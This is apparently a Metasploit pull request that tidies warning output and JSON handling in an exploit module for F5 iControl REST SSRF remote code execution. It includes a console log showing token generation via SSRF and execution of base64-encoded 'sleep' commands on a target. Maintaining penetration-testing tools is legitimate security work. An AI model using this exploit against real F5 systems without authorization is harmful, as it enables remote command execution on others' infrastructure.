### PR TITLE
Clean up exploit/linux/http/f5_icontrol_rest_ssrf_rce

### DIFF
--- a/modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb
@@ -182,17 +182,19 @@ class MetasploitModule < Msf::Exploit::Remote
     }, datastore['CmdExecTimeout'])
 
     unless res
-      vprint_warning('Command execution timed out')
+      print_warning('Command execution timed out')
       return
     end
 
-    unless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate'
+    json = res.get_json_document
+
+    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'
       fail_with(Failure::PayloadFailed, 'Failed to execute command')
     end
 
     print_good('Successfully executed command')
 
-    return unless (cmd_result = res.get_json_document['commandResult'])
+    return unless (cmd_result = json['commandResult'])
 
     vprint_line(cmd_result)
   end


### PR DESCRIPTION
Escalate a warning and prefer a variable. Minor stuff.

```
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set verbose
verbose => false
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set cmdexectimeout
cmdexectimeout => 3.5
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set cmd
cmd => sleep 3
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[*] Generating token via SSRF...
[+] Successfully generated token: HWGTTAOMC2WFM6KG7L5EXSSMUC
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/generic
[*] Executing command: eval $(echo c2xlZXAgMw== | base64 -d)
[+] Successfully executed command
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > set cmd sleep 4
cmd => sleep 4
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[*] Generating token via SSRF...
[+] Successfully generated token: VEBT6ZGMDOOBELAJQRGQRXGOXM
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/generic
[*] Executing command: eval $(echo c2xlZXAgNA== | base64 -d)
[!] Command execution timed out
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/f5_icontrol_rest_ssrf_rce) >
```

Fixes #14935.